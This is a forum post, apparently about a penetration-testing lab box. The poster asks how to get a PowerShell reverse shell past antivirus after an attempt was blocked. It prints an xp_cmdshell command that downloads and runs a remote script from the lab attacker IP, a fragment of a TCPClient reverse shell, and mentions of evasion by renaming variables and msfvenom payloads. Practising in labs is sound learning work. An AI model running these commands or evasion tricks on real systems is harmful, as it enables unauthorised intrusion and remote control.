I have rooted the box, but not without first running into a situation where antivirus blocked the powershell script one-liner I initially chose for the reverse shell (powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub). My one-liner looked very similar to the one in the walkthrough (which I eventually used successfully).
Just curious if anyone ran into the same thing and how you got past this roadblock. I tried tweaking names of variables of my script as well as tried generating completely different payloads through msfvenom but had no success.
I’m also not sure why a box that could require antivirus evasion is marked as an easy box.
1> xp_cmdshell “powershell IEX (New-Object System.Net.WebClient).DownloadString(‘http://10.10.14.109/rshell.ps1’);”
2> go
output: IEX : At line:1 char:1
output: + $c = New-Object System.Net.Sockets.TCPClient(“10.10.14.109”,443);$s = …
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: This script contains malicious content and has been blocked by your antivirus software.
output: At line:1 char:1
output: + IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14 …
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: + CategoryInfo : ParserError: (
[Invoke-Expression], ParseException
output: + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
output:
output: NULL